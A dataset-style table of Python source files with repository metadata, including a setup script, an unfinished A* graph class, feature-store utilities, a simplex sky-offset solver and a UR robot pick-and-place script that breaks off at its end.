hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a113c8e85fbfe0a4e5ea8110782dae46220ba93c | 262 | py | Python | setup.py | geickelb/hsip441_neiss_python | 0ad88a664b369ea058b28d79ed98d02ff8418aad | [
"MIT"
] | null | null | null | setup.py | geickelb/hsip441_neiss_python | 0ad88a664b369ea058b28d79ed98d02ff8418aad | [
"MIT"
] | null | null | null | setup.py | geickelb/hsip441_neiss_python | 0ad88a664b369ea058b28d79ed98d02ff8418aad | [
"MIT"
] | null | null | null | from setuptools import find_packages, setup
setup(
name='src',
packages=find_packages(),
version='0.0.1',
description='compiling code for HSIP441 using python to explore the Neiss database',
author='Garrett Eickelberg',
license='MIT',
)
| 23.818182 | 88 | 0.70229 | 33 | 262 | 5.515152 | 0.848485 | 0.131868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028169 | 0.187023 | 262 | 10 | 89 | 26.2 | 0.826291 | 0 | 0 | 0 | 0 | 0 | 0.374046 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a11510f716edaa915f408fd4bc5559303960aa62 | 1,770 | py | Python | Computer & Information Science Core courses/2168/A*/graph.py | Vaporjawn/Temple-University-Computer-Science-Resources | 8d54db3a85a1baa8ba344efc90593b440eb6d585 | [
"MIT"
] | 1 | 2020-07-28T16:18:38.000Z | 2020-07-28T16:18:38.000Z | Computer & Information Science Core courses/2168/A*/graph.py | Vaporjawn/Temple-University-Computer-Science-Resources | 8d54db3a85a1baa8ba344efc90593b440eb6d585 | [
"MIT"
] | 4 | 2020-07-15T06:40:55.000Z | 2020-08-13T16:01:30.000Z | Computer & Information Science Core courses/2168/A*/graph.py | Vaporjawn/Temple-University-Computer-Science-Resources | 8d54db3a85a1baa8ba344efc90593b440eb6d585 | [
"MIT"
] | null | null | null | """Implement the graph to traverse."""
from collections import Counter
class Node:
"""Node class."""
def __init__(self, value, x, y):
"""Initialize node."""
self.x = x
self.y = y
self.value = value
self.neighbors = []
def add_neighbor(self, n, weight):
"""Add a neighbor to this node."""
self.neighbors.append((n, weight))
class Graph:
"""Graph of nodes."""
def __init__(self):
"""Initialize."""
self.nodes = []
def add_node(self, value, x, y):
"""Add a new node to the graph."""
new_node = Node(value, x, y)
self.nodes.append(new_node)
return new_node
def add_edge(self, node1, node2, weight=1):
"""Connect two nodes with optional edge weight specification."""
node1.add_neighbor(node2, weight)
node2.add_neighbor(node1, weight)
def find_path(self, start, end):
"""Use A* to find a path from start to end in the graph."""
visited_nodes = {}
accessible_nodes = {}
current_distance = 0
current = start
# Loop as long as the end node has not been found
# this is not finished yet!!!
while(current.value != end.value):
# calculate cost for each neighbor of n
costs = []
for n in current.neighbors:
cost = self.g(n, current_distance) + self.h(n, end)
                costs.append((n, cost))
def g(self, n, current_distance):
"""Calculate the distance from the start node."""
return current_distance + n[1]
def h(self, n, end):
"""Estimate the distance to the end node using Manhattan distance."""
return abs(n[0].x - end.x) + abs(n[0].y - end.y)
| 28.095238 | 77 | 0.564972 | 236 | 1,770 | 4.139831 | 0.305085 | 0.028659 | 0.021494 | 0.022518 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009016 | 0.310734 | 1,770 | 62 | 78 | 28.548387 | 0.791803 | 0.272881 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.242424 | false | 0 | 0.030303 | 0 | 0.424242 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a116cfc21ab7921ef0308c2ab54fca839bd22800 | 2,027 | py | Python | python/hsfs/util.py | berthoug/feature-store-api | 85c23ae08c7de65acd79a3b528fa72c07e52a272 | [
"Apache-2.0"
] | null | null | null | python/hsfs/util.py | berthoug/feature-store-api | 85c23ae08c7de65acd79a3b528fa72c07e52a272 | [
"Apache-2.0"
] | null | null | null | python/hsfs/util.py | berthoug/feature-store-api | 85c23ae08c7de65acd79a3b528fa72c07e52a272 | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2020 Logical Clocks AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import json
from pathlib import Path
from hsfs import feature
class FeatureStoreEncoder(json.JSONEncoder):
def default(self, o):
try:
return o.to_dict()
except AttributeError:
return super().default(o)
def validate_feature(ft):
if isinstance(ft, feature.Feature):
return ft
elif isinstance(ft, str):
return feature.Feature(ft)
def parse_features(feature_names):
if isinstance(feature_names, (str, feature.Feature)):
return [validate_feature(feature_names)]
elif isinstance(feature_names, list) and len(feature_names) > 0:
return [validate_feature(feat) for feat in feature_names]
else:
return []
def get_cert_pw():
"""
Get keystore password from local container
Returns:
Certificate password
"""
hadoop_user_name = "hadoop_user_name"
crypto_material_password = "material_passwd"
material_directory = "MATERIAL_DIRECTORY"
password_suffix = "__cert.key"
pwd_path = Path(crypto_material_password)
if not pwd_path.exists():
username = os.environ[hadoop_user_name]
material_directory = Path(os.environ[material_directory])
pwd_path = material_directory.joinpath(username + password_suffix)
with pwd_path.open() as f:
return f.read()
class VersionWarning(Warning):
pass
class StorageWarning(Warning):
pass
| 27.026667 | 76 | 0.700543 | 260 | 2,027 | 5.319231 | 0.488462 | 0.043384 | 0.030369 | 0.023138 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0057 | 0.221016 | 2,027 | 74 | 77 | 27.391892 | 0.870171 | 0.322151 | 0 | 0.052632 | 0 | 0 | 0.044162 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0.157895 | 0.105263 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a118ceb32497416f45bc3e52e40410e78c21e051 | 836 | py | Python | python_modules/dagster/dagster/core/types/builtin_enum.py | jake-billings/dagster | 7a1548a1f246c48189f3d8109e831b744bceb7d4 | [
"Apache-2.0"
] | 1 | 2019-07-15T17:34:04.000Z | 2019-07-15T17:34:04.000Z | python_modules/dagster/dagster/core/types/builtin_enum.py | jake-billings/dagster | 7a1548a1f246c48189f3d8109e831b744bceb7d4 | [
"Apache-2.0"
] | null | null | null | python_modules/dagster/dagster/core/types/builtin_enum.py | jake-billings/dagster | 7a1548a1f246c48189f3d8109e831b744bceb7d4 | [
"Apache-2.0"
] | null | null | null | import sys
if sys.version_info.major >= 3:
import typing
class BuiltinEnum:
ANY = typing.Any
BOOL = typing.NewType('Bool', bool)
FLOAT = typing.NewType('Float', float)
INT = typing.NewType('Int', int)
PATH = typing.NewType('Path', str)
STRING = typing.NewType('String', str)
NOTHING = typing.NewType('Nothing', None)
@classmethod
def contains(cls, value):
return any(value == getattr(cls, key) for key in dir(cls))
else:
from enum import Enum
class BuiltinEnum(Enum):
ANY = 'Any'
BOOL = 'Bool'
FLOAT = 'Float'
INT = 'Int'
PATH = 'Path'
STRING = 'String'
NOTHING = 'Nothing'
@classmethod
def contains(cls, value):
return isinstance(value, cls)
| 22.594595 | 70 | 0.551435 | 92 | 836 | 5 | 0.380435 | 0.169565 | 0.056522 | 0.108696 | 0.156522 | 0.156522 | 0 | 0 | 0 | 0 | 0 | 0.001792 | 0.332536 | 836 | 36 | 71 | 23.222222 | 0.822581 | 0 | 0 | 0.148148 | 0 | 0 | 0.072967 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074074 | false | 0 | 0.111111 | 0.074074 | 0.851852 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
a11ebc5157787a925779b80587bf0be3060a8389 | 705 | py | Python | sets-add.py | limeonion/Python-Programming | 90cbbbd7651fc04669e21be2adec02ba655868cf | [
"MIT"
] | null | null | null | sets-add.py | limeonion/Python-Programming | 90cbbbd7651fc04669e21be2adec02ba655868cf | [
"MIT"
] | null | null | null | sets-add.py | limeonion/Python-Programming | 90cbbbd7651fc04669e21be2adec02ba655868cf | [
"MIT"
] | null | null | null | '''
If we want to add a single element to an existing set, we can use the .add() operation.
It adds the element to the set and returns 'None'.
Example
>>> s = set('HackerRank')
>>> s.add('H')
>>> print s
set(['a', 'c', 'e', 'H', 'k', 'n', 'r', 'R'])
>>> print s.add('HackerRank')
None
>>> print s
set(['a', 'c', 'e', 'HackerRank', 'H', 'k', 'n', 'r', 'R'])
The first line contains an integer N, the total number of country stamps.
The next N lines contains the name of the country where the stamp is from.
Output Format
Output the total number of distinct country stamps on a single line.
'''
n = int(input())
countries = set()
for i in range(n):
countries.add(input())
print(len(countries))
| 22.741935 | 87 | 0.635461 | 121 | 705 | 3.702479 | 0.479339 | 0.026786 | 0.040179 | 0.044643 | 0.075893 | 0.053571 | 0 | 0 | 0 | 0 | 0 | 0 | 0.187234 | 705 | 30 | 88 | 23.5 | 0.78185 | 0.838298 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a121e58fcc354bb0486144293e6dc4511324fbba | 1,046 | py | Python | option.py | lotress/new-DL | adc9f6f94538088d3d70327d9c7bb089ef7e1638 | [
"MIT"
] | null | null | null | option.py | lotress/new-DL | adc9f6f94538088d3d70327d9c7bb089ef7e1638 | [
"MIT"
] | null | null | null | option.py | lotress/new-DL | adc9f6f94538088d3d70327d9c7bb089ef7e1638 | [
"MIT"
] | null | null | null | from common import *
from model import vocab
option = dict(edim=256, epochs=1.5, maxgrad=1., learningrate=1e-3, sdt_decay_step=1, batchsize=8, vocabsize=vocab, fp16=2, saveInterval=10, logInterval=.4)
option['loss'] = lambda opt, model, y, out, *_, rewards=[]: F.cross_entropy(out.transpose(-1, -2), y, reduction='none')
option['criterion'] = lambda y, out, mask, *_: (out[:,:,1:vocab].max(-1)[1] + 1).ne(y).float() * mask.float()
option['startEnv'] = lambda x, y, l, *args: (x, y, l, *args)
option['stepEnv'] = lambda i, pred, l, *args: (False, 1., None, None) # done episode, fake reward, Null next input, Null length, Null args
option['cumOut'] = False # True to keep trajectory
option['devices'] = [0] if torch.cuda.is_available() else [] # list of GPUs
option['init_method'] = 'file:///tmp/sharedfile' # initial configuration for multiple-GPU training
try:
from qhoptim.pyt import QHAdam
option['newOptimizer'] = lambda opt, params, _: QHAdam(params, lr=opt.learningrate, nus=(.7, .8), betas=(0.995, 0.999))
except ImportError: pass
| 69.733333 | 155 | 0.686424 | 160 | 1,046 | 4.4375 | 0.64375 | 0.021127 | 0.008451 | 0.019718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037322 | 0.129063 | 1,046 | 14 | 156 | 74.714286 | 0.742042 | 0.144359 | 0 | 0 | 0 | 0 | 0.101124 | 0.024719 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.071429 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a12aedcd932c89aac78464696ed1d71cb2034b31 | 9,969 | py | Python | skyoffset/multisimplex.py | jonathansick/skyoffset | 369f54d8a237f48cd56f550e80bf1d39b355bfcd | [
"BSD-3-Clause"
] | null | null | null | skyoffset/multisimplex.py | jonathansick/skyoffset | 369f54d8a237f48cd56f550e80bf1d39b355bfcd | [
"BSD-3-Clause"
] | null | null | null | skyoffset/multisimplex.py | jonathansick/skyoffset | 369f54d8a237f48cd56f550e80bf1d39b355bfcd | [
"BSD-3-Clause"
] | null | null | null | import os
import logging
import platform
import time
import multiprocessing
import numpy
import pymongo
# Pure python/numpy
import simplex
from scalarobj import ScalarObjective
# Cython/numpy
import cyscalarobj
import cysimplex
class MultiStartSimplex(object):
"""Baseclass for multi-start recongerging simplex solvers."""
def __init__(self, dbname, cname, url, port):
#super(MultiStartSimplex, self).__init__()
self.dbname = dbname
self.cname = cname
self.url = url
self.port = port
connection = pymongo.Connection(self.url, self.port)
self.db = connection[self.dbname]
self.collection = self.db[self.cname]
def resetdb(self):
"""Delete existing entries in the mongodb collection for this
multi simplex optimization."""
# Drop the collection, then recreate it
self.db.drop_collection(self.cname)
self.collection = self.db[self.cname]
def _prep_log_file(self):
self.startTime = time.clock() # for timing with close_log_file()
logDir = os.path.dirname(self.logPath)
if os.path.exists(logDir) is False: os.makedirs(logDir)
logging.basicConfig(filename=self.logPath, level=logging.INFO)
logging.info("STARTING NEW SIMPLEX OPTIMIZATION ====================")
hostname = platform.node()
now = time.localtime(time.time())
timeStamp = time.strftime("%y/%m/%d %H:%M:%S %Z", now)
logging.info("MultiStartSimplex started on %s at %s"
% (hostname, timeStamp))
def _close_log_file(self):
endTime = time.clock()
duration = (endTime - self.startTime) / 3600.
logging.info("ENDING SIMPLEX OPTIMIZATION. Duration: %.2f hours"
% duration)
class SimplexScalarOffsetSolver(MultiStartSimplex):
"""Uses a Multi-Start and Reconverging algorithm for converging on the
the set of scalar sky offsets that minimize coupled image differences.
The optimization is persisted in real-time to MongoDB. This means
that multiple computers could be running threads and adding results
to the same pool. While optimization is running, it is possible to
query for the best-to-date offset solution.
"""
def __init__(self, dbname="m31", cname="simplexscalar",
url="localhost", port=27017):
super(SimplexScalarOffsetSolver, self).__init__(dbname,
cname, url, port)
def multi_start(self, couplings, nTrials, logPath, initSigma=6e-10,
restartSigma=1e-11, mp=True, cython=True, log_xtol=-6.,
log_ftol=-5.):
"""Start processing using the Multi-Start Reconverging algorithm.
Parameters
----------
nTrials : int
Number of times a simplex is started.
initSigma : float
Dispersion of offsets
restartSigma : float
Dispersion of offsets about a converged point when making a
restart simplex.
mp : bool
If True, run simplexes in parallel with `multiprocessing`.
cython : bool
True to use the cython version of simplex.
"""
self.logPath = logPath
self._prep_log_file()
self.couplings = couplings
if cython:
self.objf = cyscalarobj.ScalarObjective(self.couplings)
else:
self.objf = ScalarObjective(self.couplings)
ndim = self.objf.get_ndim()
xtol = 10. ** log_xtol # frac error in offsets acceptable for conv
ftol = 10. ** log_ftol # frac error in objective function acceptable
maxiter = 100000 * ndim
maxEvals = 100000 * ndim
simplexArgs = {'xtol': xtol, 'ftol': ftol, 'maxiter': maxiter,
'maxfun': maxEvals, 'full_output': True, 'disp': True,
'retall': False, 'callback': None}
dbArgs = {'dbname': self.dbname, 'cname': self.cname, 'url': self.url,
'port': self.port}
# Create initial simplexes
argsQueue = []
for n in xrange(nTrials):
sim = numpy.zeros([ndim + 1, ndim], dtype=numpy.float64)
for i in xrange(ndim + 1):
sim[i, :] = initSigma * numpy.random.standard_normal(ndim)
args = [sim, cython, self.couplings, simplexArgs, restartSigma,
xtol, n, nTrials, self.logPath, dbArgs]
argsQueue.append(args)
# Run the queue
pool = None
if mp:
pool = multiprocessing.Pool(processes=multiprocessing.cpu_count(),
maxtasksperchild=None)
pool.map(_simplexWorker, argsQueue)
pool.close()
pool.join()
pool.terminate()
else:
map(_simplexWorker, argsQueue)
self._close_log_file()
def find_best_offsets(self):
"""Queries the mongodb collection of simplex runs to find the
optimal result. Returns a dictionary of scalar offsets, keyed
by the field name.
"""
bestEnergy = 1e99 # running tally of best optimization result
bestOffsets = {}
recs = self.collection.find({}, ['best_fopt', 'best_offsets'])
for rec in recs:
if rec['best_fopt'] < bestEnergy:
bestEnergy = rec['best_fopt']
bestOffsets = rec['best_offsets']
# Normalize these offsets so that the net offset is zero
netOffset = 0.
fieldCount = 0
for field, offset in bestOffsets.iteritems():
netOffset += offset
fieldCount += 1
print "Net offset %.2e" % netOffset
netOffset = netOffset / fieldCount
for field, offset in bestOffsets.iteritems():
bestOffsets[field] = offset - netOffset
return bestOffsets
def init_func():
print multiprocessing.current_process().name
def _simplexWorker(argsList):
"""multiprocessing worker function for doing multi-trial simplex solving.
This essentially replaces the multi_start_simplex function in simplex.py
But this exists because it implicitly specifies the target function for the
optimization; multiprocessing can't pickle a function object.
This simplex worker has the ability to restart at the site of convergence
by constructing a simplex that is randomly distributed about the best vertex.
The simplex keeps reconverging from perturbed simplex until the reconverged
minimum matches the previous minimum. That is, I believe I have a global
minimum if the simplex returns to where it started.
"""
startTime = time.clock()
sim, useCython, couplings, kwargs, restartSigma, xTol, n, nTrials, logFilePath, dbArgs = argsList
if useCython:
objf = cyscalarobj.ScalarObjective(couplings)
else:
objf = ScalarObjective(couplings)
# Choose the simplex code
if useCython:
nm_simplex = cysimplex.nm_simplex
else:
nm_simplex = simplex.nm_simplex
#print "Running simplex %i/%i"% (n,nTrials)
Ndim = sim.shape[1]
_evalObjFunc = lambda offsets, objF: objF.compute(offsets)
# These variables keep track of how the code performs
totalFCalls = 0
nRestarts = 0
# Initial simplex compute
_xOpt, _fOpt, _nIters, _nFcalls, _warnflag = nm_simplex(objf,
sim, **kwargs)
bestFOpt = _fOpt
bestXOpt = _xOpt.copy()
totalFCalls += _nFcalls
# These arrays list the running tally of restarts vs best fopt vs total f calls
restartTally = [nRestarts]
bestFOptTally = [bestFOpt]
totalFCallTally = [totalFCalls]
# initiate restarts
while True:
nRestarts += 1
sim = numpy.zeros([Ndim+1, Ndim], dtype=numpy.float64)
sim[0,:] = bestXOpt.copy() # first vertex is the best point
for i in xrange(1,Ndim+1): # rest are randomly distributed.
sim[i,:] = restartSigma*numpy.random.standard_normal(Ndim) + bestXOpt
_xOpt, _fOpt, _nIters, _nFcalls, _warnflag = nm_simplex(objf,
sim, **kwargs)
totalFCalls += _nFcalls
# Ensure that the point has converged
convergenceFrac = (_xOpt - bestXOpt) / bestXOpt
if len(numpy.where(convergenceFrac > xTol)[0]) > 0:
# do another restart of the simplex
if _fOpt < bestFOpt:
# but we did find a new minimum
bestFOpt = _fOpt
bestXOpt = _xOpt.copy()
restartTally.append(nRestarts)
bestFOptTally.append(bestFOpt)
totalFCallTally.append(totalFCalls)
else:
# we're converged
break
# Report this in the log
runtime = time.clock() - startTime
if logFilePath is not None:
logging.basicConfig(filename=logFilePath,level=logging.INFO)
logging.info("%i/%i converged to %.4e in %.2f minutes, %i local restarts" % (n, nTrials, bestFOpt, runtime/60., nRestarts))
# Dictionary stores the history of restarts, as well as teh best solution
# as a field offset dictionary (we're breaking reusability here... just
# to make things faster.)
convergenceHistory = {"total_calls": totalFCalls, "n_restarts": nRestarts,
"runtime": runtime,
"best_offsets": objf.get_best_offsets(),
"best_fopt": bestFOpt,
"restart_hist": restartTally,
"fopt_hist": bestFOptTally,
"fcall_hist": totalFCallTally}
# Connect to MongoDB and add our convergence history!
try:
connection = pymongo.Connection(dbArgs['url'], dbArgs['port'])
db = connection[dbArgs['dbname']]
collection = db[dbArgs['cname']]
collection.insert(convergenceHistory, safe=True)
except pymongo.errors.AutoReconnect:
logging.info("pymongo.errors.AutoReconnect on %i"%n)
# collection.database.connection.disconnect()
| 39.403162 | 131 | 0.634467 | 1,128 | 9,969 | 5.528369 | 0.323582 | 0.012348 | 0.00898 | 0.011546 | 0.085953 | 0.059012 | 0.039128 | 0.028865 | 0.028865 | 0.016357 | 0 | 0.008721 | 0.275354 | 9,969 | 252 | 132 | 39.559524 | 0.854513 | 0.106831 | 0 | 0.128049 | 0 | 0 | 0.0738 | 0.00406 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.067073 | null | null | 0.012195 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a130d81a095f620365d47a00f587d3671ea0c357 | 2,416 | py | Python | libraries/urx_python/urx_scripts/demo_apple_tree.py | giacomotomasi/tennisball_demo | f71cd552e64fe21533abe47b986db6999947c3a9 | [
"Apache-2.0"
] | null | null | null | libraries/urx_python/urx_scripts/demo_apple_tree.py | giacomotomasi/tennisball_demo | f71cd552e64fe21533abe47b986db6999947c3a9 | [
"Apache-2.0"
] | null | null | null | libraries/urx_python/urx_scripts/demo_apple_tree.py | giacomotomasi/tennisball_demo | f71cd552e64fe21533abe47b986db6999947c3a9 | [
"Apache-2.0"
] | null | null | null |
import urx
import logging
import time
if __name__ == "__main__":
logging.basicConfig(level=logging.WARN)
#gripper_remove_pos = [0.0755, -0.2824, 0.3477, -0.0387, -3.0754, 0.4400] # rest position (good to place/remove gripper)
rob = urx.Robot("192.168.56.1")
#rob.set_tcp((0,0,0,0,0,0))
#rob.set_payload(0.5, (0,0,0))
home_pos = [-0.0153, -0.4213, 0.3469, 1.2430, 2.6540, -0.9590]
appro1 = [-0.0762, -0.5575, 0.3546, 0.6110, 2.7090, -1.7840]
apple1 = [-0.1042, -0.6244, 0.3209, 1.4510, 1.9160, -1.4980]
get_far1 = [-0.0510, -0.5086, 0.3215, 0.4900, 2.6510, -1.8690]
appro2 = [-0.1767, -0.4281, 0.3204, 1.8210, 2.0030, -1.5280]
apple2 = [-0.2129, -0.4926, 0.2951, 1.8210, 2.0030, -1.5280]
get_far2 = [-0.1324, -0.3790, 0.3112, 1.8210, 2.0030, -1.5280]
appro_place = [0.3571, -0.3540, 0.3563, 1.2360, 2.8850, -0.0780]
place_pos = [0.3571, -0.3540, 0.2983, 1.2360, 2.8850, -0.0780]
try:
v = 0.2
a = 0.3
rob.set_digital_out(0,0) # initialize gripper
# open gripper
rob.set_digital_out(0, 1)
time.sleep(0.5)
rob.set_digital_out(0,0)
pose = rob.getl() #gives a lists with 6 elements (x, y, z, rx, ry, rz) --> rotation vector
#print("robot tcp is at: ", pose)
# move to home position
#rob.movej(joint_pose, acc=a, vel=v) # it takes as inputs the joints goal values!
rob.movej_to_pose(home_pos, acc=a, vel=0.3)
time.sleep(0.01)
# move towards the first apple to pick (approach it, move to a suitable grabbing position, get away)
rob.movej_to_pose(appro1, acc=a, vel=v)
time.sleep(0.01)
rob.movel(apple1, acc=a, vel=v)
# close gripper
rob.set_digital_out(0, 1)
time.sleep(0.5)
rob.set_digital_out(0,0)
time.sleep(1)
rob.movel(get_far1, a, v)
#move towards the place position
rob.movej_to_pose(appro_place, a, vel=0.3)
time.sleep(0.01)
rob.movel(place_pos, a, v)
# open gripper
rob.set_digital_out(0, 1)
time.sleep(0.5)
rob.set_digital_out(0,0)
time.sleep(1)
rob.movel(appro_place, a, v)
# move to home position
rob.movej_to_pose(home_pos, a, v)
pose_final = rob.getl()
print("robot tcp is at (final): ", pose_final)
finally:
